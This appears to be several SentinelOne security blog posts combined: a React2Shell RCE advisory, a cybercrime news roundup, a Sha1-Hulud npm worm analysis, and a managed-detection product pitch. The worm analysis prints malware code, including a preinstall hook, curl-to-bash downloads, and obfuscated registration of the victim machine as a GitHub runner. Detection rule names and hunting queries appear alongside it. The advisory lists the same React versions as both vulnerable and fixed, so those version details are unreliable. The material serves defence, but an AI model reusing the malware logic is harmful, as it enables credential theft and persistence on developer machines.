A critical remote code execution (RCE) vulnerability, dubbed ‘React2Shell’, affecting React Server Components (RSC) and Next.js, is allowing unauthenticated attackers to perform server-side code attacks via malicious HTTP requests.

Discovered by Lachlan Davidson, the flaw stems from insecure deserialization in the RSC ‘Flight’ protocol and impacts packages including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Exploitation is highly reliable, even in default deployments, and a single request can compromise the full Node.js process. The flaw is being tracked as CVE-2025-55182. Originally tagged as a CVE for Next.js, NIST subsequently rejected  CVE-2025-66478, as it is a duplicate of CVE-2025-55182.

This blog post includes the critical, immediate actions recommended to secure your environment, new and existing Platform Detection Rules designed to defend against this vulnerability, and information on how SentinelOne Offensive Security Engine, a core component of  the Singularity Cloud Security solution, allows our customers to quickly identify potentially vulnerable workloads.

What is React2Shell? Background & Impact

On December 3, 2025, the React and Next.js teams disclosed two related vulnerabilities in the React Server Components (RSC) Flight protocol: CVE-2025-55182 (React) and CVE-2025-66478 (Next.js), with the latter CVE now marked by NIST as a duplicate.

• React announcement
• Next.js announcement

Both enable unauthenticated RCE, impacting applications that use RSC directly or through popular frameworks such as Next.js. These vulnerabilities are rated critical (CVSS 10.0) because exploitation requires only a crafted HTTP request. No authentication, user action, or developer-added server code is needed for an attacker to gain control of the underlying Node.js process.

The vulnerability exists because RSC payloads are deserialized without proper validation, exposing server functions to attacker-controlled inputs. Since many modern frameworks enable RSC as part of their default build, some teams may be exposed without being aware that server-side RSC logic is active in their environment.

Security testing currently shows:

• Exploitation can succeed with near 100% reliability
• Default configurations are exploitable, including a standard Next.js app created with create-next-app and deployed with no code changes
• Applications may expose RSC endpoints even without custom server functions
• A single malicious request can escalate to full Node.js process compromise

Security researchers warn that cloud environments and server-side applications using default React or Next.js builds are particularly at risk. Exploitation could allow attackers to gain full control over servers, access sensitive data, and compromise application functionality. Reports have already emerged of China-nexus threat groups “racing to weaponize” the flaw.

Available Vendor Mitigations & Immediate Actions

Fixes are available in React 19.0, 19.1.0, 19.1.1, and 19.2.0, and Next.js 5.x, Next.js 16.x, Next.js 14.3.0-canary.77 and later canary releases. Administrators are urged to audit environments and update affected packages immediately.

Companies are advised to review deployments, restrict unnecessary server-side exposure, and monitor logs for anomalous RSC requests. Securing default configurations, validating deserialized input, and maintaining a regular patch management schedule can prevent attackers from exploiting framework-level vulnerabilities in production applications.

1. Update React by installing the patched versions of React as listed above.
2. Update Next.js and other RSC-enabled frameworks as listed above. Ensure the latest framework and bundler releases are installed so they ship the patched React server bundles.
3. Review deployment behavior by checking whether your organization’s workloads expose RSC server function endpoints. These may exist regardless of whether developers added custom server functions.

How SentinelOne Protects Our Customers

Cloud Native Security – Offensive Security Engine

SentinelOne’s Offensive Security Engine (OSE), core component of its Singularity Cloud Security solution, proactively distinguishes between theoretical risks and actual threats by simulating an attacker’s methodology. Rather than relying solely on static scans that flag every potential misconfiguration or vulnerability, this engine automatically conducts safe, harmless simulations against your cloud infrastructure to validate exploitability.

This approach delivers differentiated outcomes by radically reducing alert fatigue and focusing security teams on immediate, confirmed dangers. By providing concrete evidence of exploitability—such as screenshots or code snippets of the successful simulation—it eliminates the need for manual validation and “red teaming” of every alert. Shift from chasing hypothetical vulnerabilities to remediating verified attack vectors, ensuring resources are always deployed against the risks that pose a genuine threat to their environment.

In response to this vulnerability, SentinelOne released a new OSE plugin which can verify exploitability of these vulnerabilities for publicly accessible workloads using a defanged (i.e., harmless) HTTP payload.

Viewing Misconfigurations in the SentinelOne Console

SentinelOne customers can quickly identify potentially vulnerable workloads using the Misconfigurations page in the SentinelOne Console.

This highlights Node.js workloads that are exposing RSC-related server function endpoints. Once identified, affected assets can be patched or temporarily isolated. SentinelOne CNS also detects suspicious Node.js behavior associated with exploitation attempts, providing protection while updates are deployed.

It identifies verified exploitable paths on your publicly exposed assets, confirming which systems are truly at risk. By validating exploitability rather than simply flagging theoretical vulnerabilities, Singularity Cloud Security minimizes noise and provides concrete evidence so security teams can focus on what matters.

Wayfinder Threat Hunting

The Wayfinder Threat Hunting team is proactively hunting for this emerging threat by leveraging comprehensive threat intelligence. This includes, but is not limited to, indicators and tradecraft associated with known active groups such as Earth Lamia and Jackpot Panda.

Our current operational coverage includes:

• Atomic IOC Hunting: We have updated our atomic IOC library to include known infrastructure and indicators from these threat actors, as well as broader intelligence regarding this campaign.
• Behavioral Hunting: We are actively building and executing hunts designed to detect behavioral TTP matches that identify suspicious activity beyond static indicators.

Notification & Response All identified true positive findings will generate alerts within the console for the affected sites. For clients with MDR, the MDR team will actively review these alerts and manage further escalation as required.

Platform Detection Rules

SentinelOne’s products provide a variety of detections for potential malicious follow-on reverse shell behaviors and other actions which may follow this exploit. As of December 5, 2025, SentinelOne released new Platform Detection Rules specifically to detect observed in-the-wild exploit activity. We recommend customers apply the latest detection rule, Potential Exploitation via Insecure Deserialization of React Server Components (RSC), urgently to ensure maximum protection.

Additionally, SentinelOne recommends customers verify the following existing rules have also been enabled:

• Potential Reverse Shell via Shell Processes
• Potential Reverse Shell via Node
• Potential Reverse Shell via Python
• Reverse Shell via Perl Utility
• Potential Reverse Shell via AWK Utility
• Potential Reverse Shell via GDB Utility
• Potential Reverse Shell via Lua Utility
• Potential Reverse Shell via Netcat
• Potential Reverse Shell using Ruby Utility
• Potential Reverse Shell via Socat Utility

Conclusion

CVE-2025-55182 and CVE-2025-66478 represent critical risks within the React Server Components Flight protocol. Because frameworks like Next.js enable RSC by default, many environments may be exposed even without intentional server-side configuration. Updating React, updating dependent frameworks, and verifying whether RSC endpoints exist in your organization’s workloads are essential steps.

Singularity Cloud Security helps organizations reduce risk by identifying vulnerable workloads, flagging misconfigurations, and detecting malicious Node.js behavior linked to RCE exploitation. This provides immediate visibility and defense while patches are applied.

Learn more about SentinelOne’s Cloud Security portfolio here or book a demo with our expert team today.

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

The Good | Authorities Jail WiFi Hacker, Seize €1.3B Crypto Mixer & Charge Two Malicious Insiders

An Australian national has received just over seven years in prison for running “evil twin” WiFi networks on various flights and airports to steal travelers’ data. Using a ‘WiFi Pineapple’ device as an access point, he cloned legitimate airport SSIDs. Users were then redirected to phishing sites where he harvested their credentials, which were exploited to access women’s accounts and obtain intimate content. Investigators found thousands of images, stolen credentials, and fraudulent WiFi pages. The individual has since pleaded guilty to multiple cybercrime, theft, and evidence-destruction charges.

In Europe, Swiss and German authorities have dismantled the Cryptomixer service, which allegedly laundered over €1.3 billion in Bitcoin since 2016. As part of Operation Olympia, officials seized three servers, 12 TB of data, Tor .onion domains, and €24 million in Bitcoin, with support from Europol and Eurojust. Cryptomixer, accessible on both the clear and dark web as a hybrid mixing service, obscured blockchain transactions for ransomware operators, dark markets, and a variety of criminal groups.

U.S. prosecutors have charged Virginia twin brothers for allegedly conspiring to steal sensitive government data and destroy databases after being fired as federal contractors. Previously sentenced in 2015 for unauthorized access to State Department systems, they returned to contracting roles before facing these latest indictments for fraud, identity theft, and record destruction. The Justice Department says one brother deleted 96 government databases in February 2025, stole IRS and EEOC data, and abused AI for guidance on how to hide evidence. Both men now face lengthy federal penalties if convicted.

The Bad | Investigation Exposes Contagious Interview Remote Worker & Identity Theft Scheme

In a collaborative investigation, researchers have exposed a persistent North Korean infiltration scheme linked to Operation Contagious Interview (aka UNC5267). The researchers observed in real time adversary operators using sandboxed laptops, revealing tactics designed to embed North Korean IT workers in Western companies, especially those within STEM and finance industries.

Livestreaming from a #Lazarus laptop farm.

For the first time ever, we recorded DPRK’s Famous Chollima full attack cycle: interviews, internal chats, every tool they use and every single click they made. Get ready for tons of raw footage.

Full article via ANYRUN. pic.twitter.com/2fyTn3zLI6

— Mauro Eldritch (@MauroEldritch) December 4, 2025

The operation began when a researcher posed as a U.S. developer targeted by a Contagious Interview recruiter. The attacker attempted to hire the fake developer, requesting full access to their SSN, ID, Gmail, LinkedIn, and 24/7 laptop availability. Virtual machines mimicking real developer laptops where deployed, allowing the researchers to monitor every action without alerting the operators.

The sandbox sessions showed a lightweight but effective toolkit focused on identity theft and remote access rather than malware deployment. Operators were also seen using AI-driven job tools to auto-fill applications and generate interview answers, browser-based OTP generators to bypass MFA, and Google Remote Desktop for persistent control. Reconnaissance commands validated the environment, while connections routed through Astrill VPN matched known Contagious Interview infrastructure. In one session, an operator explicitly requested ID, SSN, and banking details, confirming the goal of full identity and workstation takeover.

The investigation highlights remote hiring as a quiet yet reliable entry point for identity-based attacks. Once inside, attackers can access sensitive dashboards, critical business data, and manager-level accounts. Companies can reduce risk by raising internal awareness and providing safe channels for employees to report suspicious requests, helping prevent infiltration before it escalates into internal compromise.

The Ugly | Researchers Warn of Critical React2Shell RCE Vulnerability in React and Next.js

A critical remote code execution (RCE) vulnerability, dubbed ‘React2Shell’, affecting React Server Components (RSC) and Next.js, is allowing unauthenticated attackers to perform server-side code via malicious HTTP requests.

Discovered by Lachlan Davidson, the flaw stems from insecure deserialization in the RSC ‘Flight’ protocol and impacts packages including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Versions affected include React 19.0 to 19.2.0 and Next.js experimental canary releases 14.3.0 to 16.x below patched versions. Exploitation is highly reliable, even in default deployments, and a single request can compromise the full Node.js process.

The flaw is being tracked as CVE-2025-55182. The technically correct CVE-2025-66478 has now been marked as a duplicate.

The vulnerability exists because RSC payloads are deserialized without proper validation, exposing server functions to attacker-controlled inputs. Modern frameworks often enable RSC by default, leaving developers unknowingly exposed. Fixes are available in React React 19.0, 19.1.0, 19.1.1, and 19.2.0, and Next.js 15.0.5–16.0.7. Administrators are urged to audit environments and update affected packages immediately.

Security researchers warn that cloud environments and server-side applications using default React or Next.js builds are particularly at risk. Exploitation could allow attackers to gain full control over servers, access sensitive data, and compromise application functionality. Reports have already emerged of China-nexus threat groups “racing to weaponize” the flaw.

China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
December 4, 2025, Amazon Web Services
aws.amazon.com/blogs/securi…
@awscloud.bsky.social

[image or embed]

— 780th Military Intelligence Brigade (Cyber) (@780thmibdecyber.bsky.social) 5 December 2025 at 11:32

Companies are advised to review deployments, restrict unnecessary server-side exposure, and monitor logs for anomalous RSC requests. Securing default configurations, validating deserialized input, and maintaining a regular patch management schedule can prevent attackers from exploiting framework-level vulnerabilities in production applications. SentinelOne’s blog post on the React2Shell RCE flaw can be found here.

The Good | Poland Detains Russian Hacker Amid Rising Moscow-Linked Sabotage

Poland’s Central Bureau for Combating Cybercrime (CBZC) has arrested a Russian national in Kraków on suspicion of breaching the IT systems of local companies, marking the latest incident tied to what Warsaw describes as Russia’s expanding sabotage and espionage campaign across Europe. According to Polish Interior Minister Marcin Kierwiński, the suspect allegedly compromised corporate-level security defenses to access and manipulate company databases in ways that could have disrupted operations and endangered customers.

Investigators say the man illegally entered Poland in 2022 and later obtained refugee status. He was detained on November 16 by Polish authorities and has since been interrogated, charged, and placed in three months of pre-trial custody. Authorities also believe he may be connected to additional cyberattacks affecting firms in Poland and other EU states, and they are still determining the full scope of the damage.

The arrest comes amid heightened concern over Russian hybrid warfare since Moscow’s invasion of Ukraine in 2022. Poland has linked recent incidents, including sabotage of a railway line and a fire at a major shopping mall, to Russian intelligence activities. The country has shut down all Russian consulates following the events.

EU officials warn that cyberattacks against regional companies and institutions have surged, with many attributed to GRU-backed actors. Other recent disruptions have included payment service outages and leaks of customer data from Polish firms. In response, Polish Digital Affairs Minister Krzysztof Gawkowski plans to invest a record €930 million on bolstering the county’s cybersecurity, underscoring what authorities describe as the urgent need for stronger corporate defenses and deeper international cooperation against increasingly aggressive cyber threats.

The Bad | FBI Warns of Banking Fraud & Account Takeover Schemes Ahead of Holidays

The FBI has issued a PSA about a sharp rise in account takeover (ATO) fraud, with cybercriminals impersonating financial institutions to steal more than $262 million since January 2025. The agency’s Internet Crime Complaint Center (IC3) has received over 5,100 reports this year from victims across individuals, businesses, and organizations across every sector.

The schemes start off with deceiving victims through texts, calls, and emails, posing as bank staff or customer support. They trick targets into revealing their login credentials, multi-factor authentication (MFA) codes, or one-time passcodes (OTPs). Criminals have also been luring victims onto phishing websites engineered to mimic legitimate banking or payroll sites, sometimes boosted through SEO poisoning to appear at the top of search results.

Once inside the victim’s account, fraudsters reset passwords, lock out the rightful owners, and quickly transfer funds into crypto-linked accounts, which makes recovery extremely difficult. Some victims report being manipulated with fabricated claims of fraudulent purchases, or even firearm transactions to incite panic, before being redirected to a second scammer impersonating law enforcement.

As we enter the holiday season, the FBI urges consumers and organizations to monitor their accounts closely, use strong unique passwords, enable MFA, verify URLs, and avoid visiting personal banking sites through search engine results. Victims should immediately contact their financial institutions to request recalls and provide indemnification documents, and then file detailed reports with IC3.

Officials and security experts stress that most ATO cases stem from compromised credentials. Stronger identity verification such as passwordless authentication and enabling manual verification steps remain basic security hygiene necessary for reducing these types of attacks.

The Ugly | OpenAI Alerts API Users After Mixpanel Breach Exposes Limited Data

OpenAI is alerting some ChatGPT API customers that limited personally identifiable information (PII) was exposed after its third-party analytics provider, Mixpanel, was breached. The compromise, stemming from an smishing campaign detected on November 8, affected “limited analytics data related to some users of the API”, but did not compromise ChatGPT or other OpenAI products.

While OpenAI confirmed that sensitive information such as credentials, API keys, requests, and usage data, payment and chat details, or government IDs remained secure, the exposed data may include usernames, email addresses, approximate user location, browser and operating system details, referring websites, and account or organization IDs.

OpenAI said users do not need to reset passwords or regenerate API keys. Some users have reported that CoinTracker, a cryptocurrency tracking platform, may also have been affected, with limited device metadata and transaction counts exposed.

Has @mixpanel not disclosed this breach? Sent from @CoinTracker. pic.twitter.com/xk9nmGVmfm

— Daniel Harrison (@danielh9277) November 27, 2025

OpenAI has begun an investigation, removed Mixpanel from production services, and is notifying affected users directly. The company warns that the leaked data could be used for phishing or social engineering attacks and advises users to verify any messages claiming to relate to the incident, enable MFA, and to never share account credentials via email, text, or chat.

Mixpanel, in turn, has responded to the incident by securing accounts, revoking active sessions, rotating compromised credentials, blocking the threat actor’s IPs, resetting employee passwords, and implementing new controls to prevent future incidents. The analytics firm also reached out to all impacted customers directly.

The incident highlights the risks posed by third-party service providers and the importance of awareness against phishing, even when no core systems or highly sensitive information are directly compromised.

Shai-Hulud Worm 2.0 is a major escalation of the NPM supply chain attack, now executing in the preinstall phase to harvest credentials across AWS, Azure, and GCP and establish persistence via GitHub Actions.

The following SentinelOne Flash Report was sent to all SentinelOne customers and partners on Tuesday, November 25, 2025. It includes an in-depth analysis of the new variant’s tactics, our real-time detection posture, and the critical, immediate actions required to secure your environment.

Sha1-Hulud: The Second Coming

Key Takeaways

• A new wave of compromised NPM packages is leading to wide-scale supply chain attacks.
• This attack shows additional capabilities compared to previous attacks.
• Victims should immediately change their tokens and secrets, including those associated with any affected cloud environment.

Technical Details

Overview

“Sha1-Hulud” is the name of an ongoing NPM supply chain attack which started as early as November 21, 2025 according to public information. The new attack is similar to the previous “Shai Hulud”, but includes additional features and is triggered by different compromised packages. The name of the new attack comes from the malware author’s description inside the GitHub repository with the exfiltrated data:

While the attacks share similarities, the new attack is slightly different from the previous one and it is not yet known if both attacks come from the same threat actor.

The current attacks have impacted several popular packages such as:

• Postman
• Zapier
• AsyncAPI

A comprehensive list of affected packages can be found here.

Execution & Persistence

Unlike the previous attack, which used “postinstall” to trigger the malware execution, the “Sha1-Hulud” attack utilizes “preinstall” to execute the malware:

...

"scripts": {

"preinstall": "node setup_bun.js"

}

...

}

The malware downloads the legitimate “bun” tool to orchestrate the current attack:

async function downloadAndSetupBun() {

try {

let command;

if (process.platform === 'win32') {

// Windows: Use PowerShell script

command = 'powershell -c "irm bun.sh/install.ps1|iex"';

} else {

// Linux/macOS: Use curl + bash script

command = 'curl -fsSL https://bun.sh/install | bash';

}

…

const environmentScript = path.join(__dirname, 'bun_environment.js');

if (fs.existsSync(environmentScript)) {

runExecutable(bunExecutable, [environmentScript]);

} else {

process.exit(0);

}

The file “bun_environment.js” is an obfuscated JavaScript malware being added to the compromised packages in the “Sha1-Hulud” attack.

This script creates additional files such as “cloud.json”, “contents.json”, “environment.json”, and “truffleSecrets.json” for exfiltration and “discussion.yaml” for persistence.

The payload then registers the infected machine as a self-hosted runner named “SHA1HULUD”:

let _0x449178 = await this.octokit.request("POST /repos/{owner}/{repo}/actions/runners/registration-token", {

'owner': _0x349291,

'repo': _0x2b1a39

});

if (_0x449178.status == 0xc9) {

let _0x1489ec = _0x449178.data.token;

if (a0_0x5a88b3.platform() === 'linux') {

await Bun.$`mkdir -p $HOME/.dev-env/`;

await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");

await Bun.$`RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`rm actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");

Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();

} else {

if (a0_0x5a88b3.platform() === "win32") {

await Bun.$`powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-win-x64-2.330.0.zip -OutFile actions-runner-win-x64-2.330.0.zip"`.cwd(a0_0x5a88b3.homedir());

await Bun.$`powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"actions-runner-win-x64-2.330.0.zip\", \".\")"`.cwd(a0_0x5a88b3.homedir());

await Bun.$`./config.cmd --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir()).quiet();

Bun.spawn(["powershell", '-ExecutionPolicy', "Bypass", "-Command", "Start-Process -WindowStyle Hidden -FilePath \"./run.cmd\""], {

'cwd': a0_0x5a88b3.homedir()

}).unref();

} else {

if (a0_0x5a88b3.platform() === "darwin") {

await Bun.$`mkdir -p $HOME/.dev-env/`;

await Bun.$`curl -o actions-runner-osx-arm64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`tar xzf ./actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");

await Bun.$`./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`rm actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + '/.dev-env');

Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();

}

}

}

For persistence, the malware adds a workflow called “.github/workflows/discussion.yaml” that contains an injection vulnerability, allowing the threat actor to write a specially crafted message in the repository discussions section. Subsequently, the message executes code on the infected host registered as a runner.

Impact & Objectives

Unlike previous attacks that only targeted the software development environment, this attack also steals AWS, GCP, and Azure secrets that could allow the threat actor to move laterally across the cloud environment. Such information is saved to the “cloud.json” file:

The base64 in Fig. 3 translates to the following:

{"aws":{"secrets":[]},"gcp":{"secrets":[]},"azure":{"secrets":[]}}

The creation of the file does not necessarily mean that the cloud secrets have been stolen as the config can be empty.

The threat actor is also using Trufflehog in this new attack to steal secrets related to the development environment such as GitHub and NPM secrets and tokens – a similar tactic seen in the previous “Shai-Hulud” attack.

While the exact motives of the attackers are currently unknown, successful infection is resulting not only in the theft of intellectual property and private code, but also cloud secrets that could allow a broader breach across a cloud environment. The persistence capabilities allow the threat actor to execute malicious code on the infected host, which is an asset within the development environment of the victim.

SentinelOne Detection Capabilities

Endpoint Protection (EPP)

SentinelOne EPP behavioral AI engines continuously monitor for suspicious activities associated with supply chain attacks and worm propagation, including:

• Execution of malicious scripts and packages
• Unauthorized file modifications in CI/CD workflows
• Privilege escalation and credential abuse
• Suspicious runtime installations and network-based script execution

Platform Detection Rules

The SentinelOne Platform Detection Library includes rules to detect Shai-Hulud worm activity across multiple attack stages:

• Potential Malicious NPM Package Execution – Detects execution of known malicious npm packages used by Shai-Hulud
• Shai-Hulud Worm Workflow File Write Activity – Identifies unauthorized modifications to GitHub Actions workflows and malicious payload deployment
• Shai-Hulud Bun Runtime Installation via Network Fetch – Catches suspicious Bun runtime installations via remote script execution
• Shai-Hulud Unattended GitHub Runner Registration – Detects automated registration of self-hosted GitHub runners with malicious characteristics

Threat Hunting

The Wayfinder Threat Hunting team is proactively hunting, leveraging threat intelligence associated with this emerging threat. If any suspicious activity is identified in your environment, we will notify your organization’s designated escalation contacts immediately.

Recommendations

Wayfinder Threat Hunting provides the following recommendations for immediate action and strategic mitigation:

1. Enable the relevant Platform Detection Rules from the section above.
2. Enable Agent Live Security Update for real-time updates.
3. Remove and replace compromised packages.
4. Pin package versions where possible.
5. Disable npm postinstall scripts in CI where possible.
6. Revoke and regenerate npm tokens, GitHub secrets, SSH keys, and cloud provider credentials.
7. Enforce hardware-based MFA for developer and CI/CD accounts.

Tactical Tools for HuntOps

IOCs (Indicators of Compromise)

Hunting Queries

Query 1: SHA1HULUD Runner Execution

dataSource.name = 'SentinelOne' and event.type = 'Process Creation' and src.process.cmdline contains '--name SHA1HULUD' and src.process.cmdline contains '--unattended --token '

Query 2: SHA1HULUD Malicious JS

dataSource.name = 'SentinelOne' AND tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc") and src.process.name contains 'node'

Query 3: Suspicious “bun_environment.js” Files Potentially Linked to SHA1HULUD

dataSource.name = 'SentinelOne' AND tgt.file.size>7000000 AND (tgt.file.path contains '/bun_environment.js' or tgt.file.path contains '\\bun_environment.js') AND !(tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc"))

This is an era defined by relentless pressure on cybersecurity professionals. As environments and attack surfaces have expanded, endpoint, cloud, identity, and now AI signals continue to pile up faster than teams can interpret them. Meanwhile, rapidly evolving TTPs, fueled by ransomware-as-a-service (RaaS) and other off-the-shelf tooling have enabled motivated threat actors to move with the sophistication and speed of the most advanced nation state adversaries.

With defenders stretched thin, actors are using these advanced techniques to hide behind operational noise. And, while handling alert fatigue isn’t enough, even mature teams can struggle to confront advanced persistent threats, especially those that specialize in evasion and long-term access.

Addressing these new realities requires reimagining defenses – new strategies to unify signals, eliminate the noise, augment human capacity, and truly prepare for incidents long before they happen. This requires more than just better tools. It requires a full shift in how detection and response is delivered.

That shift is SentinelOne’s Wayfinder Threat Detection and Response (Wayfinder TDR), now generally available (GA).

Our Ethos | Defense Through AI, Intelligence & Human Experts

Wayfinder TDR is built on a foundational belief: True cyber resilience emerges from the fusion of AI, intelligence, and world-class human expertise – not from any single component in isolation.

Modern adversaries evolve too quickly, hide too effectively, and move too fluidly for traditional service models to keep up. Automated systems can miss subtle behaviors and human teams alone cannot keep pace with the scale of telemetry, meaning generic threat feeds are no longer the right solution. True defense requires three pillars working in concert.

Intelligence provides the early warning – timely, curated, contextual insight into an attacker’s behavior and tactics. SentinelOne integrates Google Threat Intelligence (GTI), one of the most powerful and comprehensive intelligence sources in the world, directly into every part of Wayfinder. It delivers a level of global threat visibility previously available only to a small set of elite organizations. This data is combined with our SentinelOne intelligence for an unparalleled set of threat content previously unseen in cybersecurity.

AI then transforms that intelligence and raw telemetry into actionable outcomes. SentinelOne’s industry-leading Purple AI engine automates triage, accelerates investigation, enriches findings with context, and closes the gap between detection and action. AI allows Wayfinder experts to cut through overwhelming volumes of data and surface what actually matters to the operation.

Finally, human expertise applies the experience and ingenuity to understand and act on what’s uncovered. Across 16 countries, SentinelOne’s team of threat hunters, analysts, incident responders, and strategic advisors bring decades of hands-on experience with the world’s most sophisticated adversaries. This combined knowledge closes gaps that machines alone cannot see, validating ambiguous signals and guiding customers through moments of uncertainty with clarity and confidence.

Wayfinder deepens this philosophy by combining elite human expertise with agentic, AI-powered threat hunting and investigations. This multi-layered human and AI model brings a level of defense that neither humans nor machines can achieve alone. We believe that the future of AI security is one that elevates – rather than replaces – human defenders, arming them with the speed of automation and the insights of global intelligence.

Our Portfolio | Tailored Protection & Elite Expertise

Wayfinder Threat Detection & Response is a unified portfolio designed to meet organizations where they are. From automated hunting and 24/7/365 MDR to high-touch advisory services during crises, each Wayfinder offering can either stand alone, or bring a comprehensive and adaptive defense program together.

These services deliver end-to-end coverage across preparation, detection, investigation, response, and recovery, ensuring customers are supported through every phase of the threat lifecycle.

Wayfinder Threat Hunting

Threat hunting is the foundation of the portfolio, delivering always-on, fully automated hunts powered by GT, SentinelOne’s threat intelligence, and enriched by SentinelOne experts. It continuously scans customer environments for emerging attacker infrastructure, high-confidence indicators of compromise, and evolving techniques.

Wayfinder Threat Hunting is unique in that it requires no manual tuning, no scheduled queries, and no analyst scripting. Intelligence updates stream directly into the system and are matched against customer telemetry with contextual attribution – threat actor, campaign, and MITRE mapping all included. Findings immediately feed into MDR workflows for rapid investigation and response.

This eliminates blind spots that attackers rely on and brings dynamic, intelligence-led coverage to every organization, regardless of staffing or maturity level.

Wayfinder MDR Essentials

MDR Essentials delivers enterprise-grade, always-on XDR coverage across endpoints, cloud environments, identity providers, and supported partner services. It provides continuous monitoring, triage, investigation, and response, powered by SentinelOne analysts, AI-driven inference, and threat hunting insights. Using curated intelligence from both SentinelOne’s AI-driven alerting and triage and Google Threat Intelligence, get rapid insight and protection at scale.

MDR Essentials is built for organizations that want strong, immediate defense without operational complexity. Onboarding and activation are simple and swift while coverage is unified through the Singularity Platform. Customers benefit from 24/7 protection, rapid containment, and detailed guidance without needing to expand internal teams.

With MDR Essentials, organizations finally get the confidence that cyber experts are watching every signal, every hour, across every critical surface.

Wayfinder MDR Elite

Wayfinder MDR Elite extends the Essentials experience with a premium, high-touch operating model for organizations that are looking for deeper partnership, strategic alignment, and more proactive readiness and response. Every MDR Elite customer receives a dedicated Threat Advisor, an expert who becomes embedded in their security program, and offers hands-on guidance, operational reviews, and tailored risk management recommendations.

Elite also provides bundled access to SentinelOne’s DFIR specialists, enabling advanced investigations, malware analysis, and targeted forensics. As well, Elite customers receive a built-in Incident Readiness & Response (IRR) retainer, ensuring they have pre-approved hours available for compromise assessments, breach simulations, preparedness workshops, and expert counsel during major incidents.

For teams that want not just coverage but clarity, Elite becomes a trusted extension of their leadership and decision-making process.

Wayfinder Incident Readiness & Response

Wayfinder IRR creates a foundation of preparedness that many organizations simply do not have today. With a renewable pool of hours, customers can proactively strengthen their posture or engage experts during high-pressure moments.

The key to this offering is flexibility. Use those hours to get immediate, 24/7/365 access to elite DFIR specialists that respond effectively and compliantly to critical incidents. Or use hours for breach readiness exercises and compromise assessments to uncover hidden risks and improve your security posture and readiness.

Wayfinder IRR experts act as a trusted partner who can guide organizations through high-pressure moments before, during, and after a breach to build confidence, clarity, and resilience. Expert-led exercises, simulations, and advisory services will transform theoretical security plans into reliable, tested incident response capabilities. And when incidents do occur, our team will not only contain, investigate, and stop the breach in its tracks, but will reconstruct attacker activity to understand the “how” and “what” of an incident, identifying compromised accounts, exfiltrated data, and affected systems.

Wayfinder Emergency Response

For organizations experiencing an active breach without a retainer in place, Wayfinder Emergency Response provides urgent access to a 40-hour block of DFIR expertise. It enables rapid containment, adversary eviction, hands-on investigation, and guidance during critical situations.

Our experts’ deep platform expertise speeds investigations and delivers critical evaluations such as rapid Root Cause Analysis, malware reverse engineering, IOC analysis, and more. With Wayfinder Emergency Response, achieve complete incident control with rapid threat containment, root cause analysis, and privileged, counsel-driven investigative support with defensible reporting. This ensures that all organizations have an expert-led lifeline supported by AI-driven analysis and Google-enhanced intelligence during the most critical moments.

Our Vision | Redefining Managed Services for the AI Era

For years, organizations have been forced to choose between generic intelligence feeds, siloed MDR services, and incomplete incident response retainers. These make for complex in-house responsibilities since point solutions only offer bolt-ons rather than cohesive strategies. AI was under utilized. Human expertise was expensive, inconsistent, or inaccessible. We set out to eliminate the fragmentation that leaves so many organizations exposed.

SentinelOne’s Wayfinder TDR services break that cycle by unifying agentic AI, elite human operators, and unmatched threat intelligence insights into a single, adaptive defense fabric. The result? A portfolio that not only responds to threats but proactively seeks them out, contextualizes them, and then empowers organizations to act with precision and speed.

It stands alone in merging together the deep integration of GTI, operational automation driven by AI, and the global scale of human expertise. Instead of stitching together disparate solutions, Wayfinder is purpose-built to streamline telemetry, intelligence, and human insight into a coherent defense program.

This shift matters as modern adversaries are no longer linear nor predictable – they’re fluid. They adapt rapidly. And, they exploit operational complexity. To reduce that complexity, Wayfinder closes detection gaps and reduces the noise while ensuring that experts are available before, during, and after any incident.

